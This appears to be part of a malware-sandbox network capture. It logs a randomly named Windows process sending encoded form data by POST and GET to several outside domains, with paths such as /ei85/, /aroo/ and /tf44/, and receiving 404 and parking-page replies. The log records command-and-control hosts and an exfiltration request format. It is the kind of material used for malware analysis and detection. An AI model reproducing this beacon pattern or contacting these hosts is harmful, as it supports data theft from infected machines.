                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/cQegkOxlCk5GEbwW3tcy2Qw03cdU8MQBY=
                Timestamp: Aug 23, 2024 04:20:41.281512976 CEST | Bytes transferred: 1236 | Direction: IN | Data:
                HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:41 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49760 | Destination IP: 199.192.19.19 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:43.221774101 CEST | Bytes transferred: 10877 | Direction: OUT | Data:
                POST /ei85/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.telwisey.info
                Origin: http://www.telwisey.info
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.telwisey.info/ei85/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex= [TRUNCATED]
                Timestamp: Aug 23, 2024 04:20:43.985950947 CEST | Bytes transferred: 1236 | Direction: IN | Data:
                HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:43 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]


                Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49761 | Destination IP: 199.192.19.19 | Destination Port: 80 | PID: 2412 | Process: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp: Aug 23, 2024 04:20:45.751596928 CEST | Bytes transferred: 511 | Direction: OUT | Data:
                GET /ei85/?AZOTcfex=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.telwisey.info
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Timestamp: Aug 23, 2024 04:20:46.355967045 CEST | Bytes transferred: 1236 | Direction: IN | Data:
                HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:46 GMT
                Server: Apache
                Content-Length: 16026
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                Aug 23, 2024 04:20:46.355989933 CEST | 224 | IN | Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.
                Aug 23, 2024 04:20:46.356002092 CEST | 1236 | IN | Data Ascii: 461,4.668,2.705,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet">
                Aug 23, 2024 04:20:46.356014013 CEST | 224 | IN | Data Ascii: c36.069,0,68.978-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="ro
                Aug 23, 2024 04:20:46.356024027 CEST | 1236 | IN | Data Ascii: und" stroke-miterlimit="10" x1="518.07" y1="245.375" x2="518.07" y2="266.581" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="5
                Aug 23, 2024 04:20:46.356034040 CEST | 224 | IN | Data Ascii: roke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="200.67" y1="483.11" x2="200.67" y2="504.316" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="roun
                Aug 23, 2024 04:20:46.356089115 CEST | 1236 | IN | Data Ascii: d" stroke-miterlimit="10" x1="210.611" y1="493.713" x2="190.73" y2="493.713" /> </g> </g> <g id="starsSmall"> <g> <line fill="none" stroke="#0E0
                Aug 23, 2024 04:20:46.356101990 CEST | 1236 | IN | Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="227.55" y1="295.189" x2="235.387" y2="295.189" /> </g> <g>
                Aug 23, 2024 04:20:46.356206894 CEST | 1236 | IN | Data Ascii: 967" x2="480.296" y2="415.326" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="484.215" y1="411.146" x2="476.378" y2="411.146" /> <
                Aug 23, 2024 04:20:46.356219053 CEST | 1236 | IN | Data Ascii: "3" stroke-linecap="round" stroke-miterlimit="10" cx="133.343" cy="477.014" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" c
                Aug 23, 2024 04:20:46.361094952 CEST | 1236 | IN | Data Ascii: ="round" stroke-linejoin="round" stroke-miterlimit="10" d="M273.813,410.969c0,0-54.527,39.501-115.34,38.218c-2.28-0.048-4.926-0.241-7.841-0.548c-68.038-7.178-134.288-43.963-167.33-103.87c-0.908-1.646-1.7


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                25 | 192.168.2.4 | 49762 | 213.145.228.168 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:20:51.727108002 CEST | 778 | OUT | POST /aroo/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.sandranoll.com
                Origin: http://www.sandranoll.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.sandranoll.com/aroo/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=WIabGlVXn4l28+pGdeG8Zps2FJM7dhx91zID6HMSYOPwS730XyIilQdn6KGapwvdKCnGHIONXTeic0sGVguWDD46v/lBsgmAfWOHWmEmkHvgT011bbPCcXxtAE03xj21OgRAtLVZjLr0jArCfCmdWk8dQckXNvpl67hXx2G97sutIYk/KU/L8wFN/pu9VX7/iQ==
                Aug 23, 2024 04:20:52.510644913 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:52 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: cb3<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                Aug 23, 2024 04:20:52.510668039 CEST | 1236 | IN | Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                Aug 23, 2024 04:20:52.510680914 CEST | 1057 | IN | Data Ascii: /tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:55px;height:55px;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png" alt="Linux VServer" /></td><td style="width:300px;">G&uuml;nstige Linux
                Aug 23, 2024 04:20:52.510693073 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                26 | 192.168.2.4 | 49763 | 213.145.228.168 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:20:54.268488884 CEST | 798 | OUT | POST /aroo/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.sandranoll.com
                Origin: http://www.sandranoll.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.sandranoll.com/aroo/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwh+iunJYUG25Vqw8KLk+iNSa3QXJBB0KAI=
                Aug 23, 2024 04:20:54.962217093 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:54 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 4a1<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                Aug 23, 2024 04:20:54.962238073 CEST | 1236 | IN | Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table>835<tr><td><ta
                Aug 23, 2024 04:20:54.962254047 CEST | 1099 | IN | Data Ascii: 2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:55px;height:55px;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png" alt="Linux VServer" /></td><td style="width:300px;">G&uuml;nstig
                Aug 23, 2024 04:20:54.965553045 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                27 | 192.168.2.4 | 49764 | 213.145.228.168 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:20:56.804831028 CEST | 10880 | OUT | POST /aroo/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.sandranoll.com
                Origin: http://www.sandranoll.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.sandranoll.com/aroo/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI6SMaovB0+/3mhh1M6zUnKPyUmqyKbciAJFSwBBQDhHXGq0SSHDqbJdAs1YxSQjt2xMLoq5ul6Tsb7DNEtnKXb8hrPTJ5auELFR1l2nHUbRf+7TVvBJ85x/LXknORAKc8usQB2my6jB3OOmAmewQu469ZscPGxCFJJ0ZaSUSbYS9mNWDQskxIqkVMN/xQd5Fuo65yYaH/k1IDUF/6h0//CqVSpR3EF1wEzYDSnHqwpwFyOZ8HVoSX21Q/aUYy4hK8P40IlK64nTfBzIiIPaC9rAVF9sbPwFIirOjON2AeynqgZYHiNGGAEbUFyS4FwXACLgv+DxYxKSQdJM7tLVuE4x3lqgXUMyeLjFhS2UFFJMsIfuVUc/F0IvX6nvOYRYoai/j/9Njkil3cZo0XUCAszLSVoGSqZmsJAUfLQ4Di+qUYzL1vCv9qX+bYJi/KMR2rQkmDq8FOIJ7jS1Aw7R2X6CY96d3BRnAD6UBPigfN+TB3Z5BgzLZkBz5ndMhfh2HT7v11upi5YwddLq+oj3tSjwTJTnSpxwY8dv+deJyN3fjDUKN8WrLhQ9dosHSqcsUY5nsqSHIUsKfSmZ57o2KdqIIrXzb0dVPgS/jHn4YOpGv3VaJOeayEP0jo9/Z5Vj1BqVrTJZ7z1Y+93BxC4cyPbmOqmxxkRHBPyI6m1kdLM6P4K14/5gi4sToR/pHXDFa9g31MJeIhpZn2xIMybVxidWwKlQXlxnyi87y99DrnJkFkTicYzp09pxdPibsTPWuGIrMowUFC7AkJcU6VegnjSwLN9Zx0nRVRt6eHuGwapmD3tFoNWaQj3zncN8bLIawM8 [TRUNCATED]
                Aug 23, 2024 04:20:57.530765057 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:57 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                Aug 23, 2024 04:20:57.530777931 CEST | 224 | IN | Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">854
                Aug 23, 2024 04:20:57.530788898 CEST | 1236 | IN | Data Ascii: <table><tr><td><table><tr><td colspan="2"><h2>Das Modul Datenbanken im Domaintechnik&reg; Hosting Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadm
                Aug 23, 2024 04:20:57.530802011 CEST | 899 | IN | Data Ascii: ">Typo 3 zeichnet sich durch seine hohe Flexibilit&auml;t und zahlreiche Erweiterungen aus. Ganz einfach &uuml;ber Ihr Hosting Control Panel zu installieren. </td></tr></table></td><td><table><tr><td colspan="2"><h2>Das Domaintechnik.at Affili
                Aug 23, 2024 04:20:57.531040907 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                28 | 192.168.2.4 | 49765 | 213.145.228.168 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:20:59.346244097 CEST | 512 | OUT | GET /aroo/?bB7L5=DPt0-rQpMXpt&AZOTcfex=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.sandranoll.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:21:00.064162016 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 02:20:59 GMT
                Server: Apache/2.4.61 (Debian)
                X-Powered-By: PHP/7.4.33
                Strict-Transport-Security: max-age=63072000; preload
                Connection: Upgrade, close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 885<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                Aug 23, 2024 04:21:00.064182997 CEST | 1236 | IN | Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                Aug 23, 2024 04:21:00.064198971 CEST | 1184 | IN | Data Ascii: <table><tr><td colspan="2"><h2>Das Domaintechnik.at Affiliate Programm</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;width:75px;height:75px" src="https://www.domaintechnik.at/fileadmin/gfx/icons/partner
                Aug 23, 2024 04:21:00.068008900 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                29 | 192.168.2.4 | 49766 | 91.195.240.19 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:05.202802896 CEST | 778 | OUT | POST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Ascii: AZOTcfex=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPr3QouluSRSC2rGhqAqCFVggl7xrGk4eAg==
                Aug 23, 2024 04:21:05.837100983 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                date: Fri, 23 Aug 2024 02:21:05 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                30 | 192.168.2.4 | 49767 | 91.195.240.19 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:21:07.737508059 CEST | 798 | OUT | POST /tf44/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.gipsytroya.com
                Origin: http://www.gipsytroya.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.gipsytroya.com/tf44/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 36 45 76 32 45 4b 34 55 2f 4d 54 48 72 68 36 59 57 4c 77 42 6f 6e 56 54 76 35 46 46 58 31 71 36 58 69 39 4e 6c 35 4e 58 4b 33 32 59 63 36 4d 46 4c 32 54 70 64 68 4f 77 58 4a 39 47 76 2f 39 77 37 6c 67 37 35 2f 44 4a 33 2f 76 39 64 4f 59 48 63 70 6e 51 48 78 4b 50 6c 45 6c 76 45 7a 4b 30 66 69 4a 66 57 32 47 4c 6d 6a 59 57 35 73 69 4f 57 7a 2f 2b 52 54 61 67 64 2f 46 46 42 52 38 71 4f 38 6c 4d 6e 39 31 2b 57 64 4a 45 61 63 68 4a 6f 5a 72 33 47 71 2b 61 6d 39 78 4b 64 69 2b 63 36 4e 58 37 37 78 4c 56 58 56 45 54 34 38 34 66 4c 6e 46 58 62 6b 76 46 64 6f 5a 2b 54 33 4d 4c 36 57 4d 37 49 30 70 49 4a 4a 77 3d
                Data Ascii: AZOTcfex=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX1q6Xi9Nl5NXK32Yc6MFL2TpdhOwXJ9Gv/9w7lg75/DJ3/v9dOYHcpnQHxKPlElvEzK0fiJfW2GLmjYW5siOWz/+RTagd/FFBR8qO8lMn91+WdJEachJoZr3Gq+am9xKdi+c6NX77xLVXVET484fLnFXbkvFdoZ+T3ML6WM7I0pIJJw=
                Aug 23, 2024 04:21:08.371984959 CEST | 707 | IN | HTTP/1.1 405 Not Allowed
                date: Fri, 23 Aug 2024 02:21:08 GMT
                content-type: text/html
                content-length: 556
                server: Parking/1.0
                connection: close
